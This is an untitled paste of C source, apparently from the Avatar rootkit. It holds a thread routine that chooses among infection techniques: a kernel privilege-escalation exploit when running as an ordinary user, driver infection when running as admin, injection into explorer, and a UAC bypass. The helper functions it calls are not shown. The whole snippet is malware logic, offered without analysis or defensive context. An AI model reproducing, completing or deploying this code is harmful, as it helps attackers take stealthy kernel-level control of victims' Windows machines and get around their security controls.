Untitled

DWORD WINAPI Avtr_ThreadProc( pavtr_listelem Elem )
{
	if ( !Elem )
		return 1;
	if ( Elem->technique == 0x80000000 )
	{
		if ( Avtr_getKernelRoutines() )
		{
			int priv_value = Elem->privilege_value;
			if ( ! --priv_value ) //1 => ordinary user
			{
				if ( KeAcquireInStackQueuedSpinLock )
					afs_sys_exploit();
			}
			else if ( ! --priv_value ) //2 => admin
			{
				Avtr_AdminInfectDriver();
			}
		}
		return 0;
	}
	else if ( Elem->technique == 0x80000001 )
	{
		Avtr_inject_explorer(Elem);
	}
	else if ( Elem->technique == 0x80000002 )
	{
		/*Executed only if Avatar is compiled as a DLL*/
		LPWSTR ModuleFileName = Avtr_Structure->Mem + 0x120;
		Avtr_UAC_bypass(ModuleFileName);
		HANDLE hEvent = CreateEventA(NULL,TRUE,FALSE,Global_17);
		SetEvent(hEvent);
	}
	HANDLE hEvent = CreateEventA(NULL,FALSE,FALSE,Global_03);
	if ( hEvent )
	{
		SetEvent(hEvent);
		CloseHandle(hEvent);
	}
	return 0;
}